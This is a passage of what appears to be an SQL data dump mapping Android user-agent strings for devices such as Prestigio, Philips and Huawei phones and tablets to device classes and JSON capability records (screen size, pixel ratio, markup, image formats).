Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PAP3350DUO) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PAP3400DUO) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PAP3501DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PAP3540DUO) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PAP4044DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PAP4055DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PAP4055DUO) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PAP4300 DUO) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PAP5044DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PAP5300DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PAP5500DUO) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PAP7600DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PE-TL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PGN-404) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PGN-506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PGN-508) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PHQ519) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PMT3037_3G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_prestigio_pm','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PMT5002_Wi) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_prestigio_pm','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PMT5021_3G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_prestigio_pm','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PSP3450DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PSP3455DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PSP3502DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PSP3503DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PSP3509DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PSP3519DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PSP5453DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PSP5470DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PSP5504DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PSP5505DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PSP5508DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PSP5517DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PSP5550DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; PURE_III) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Panasonic ELUGA S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Personal Huawei G620S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Personal Huawei Y550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips I908) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips S308) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips S309) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips S398) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips V387) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips W3500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips W3568) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips W3568) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips W6610) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips W6610) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips W832) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips W8510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips W8510) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips_I928) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips_S307) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips_S388) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Philips_S398) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Point X45 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Polaroid PSPC505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Primo_F4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Pulsar) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; QUAD-CORE A33 y3) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; QUANTUM_2_400) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; QUANTUM_400_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Qumo Quest 474) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; R1001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; R1011) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; R2001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; R355) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; R8006) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; R8106) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; R815) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; R819) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; R8201) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; R831L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; RAINBOW 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; RIDGE 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; RIDGE FAB 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; RioPlay) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Rocket) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; S10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; S50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; S500A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; S50D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; S55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; S56) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; S57) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I8190N) AppleWebKit/* (KHTML, like Gecko) Mobile 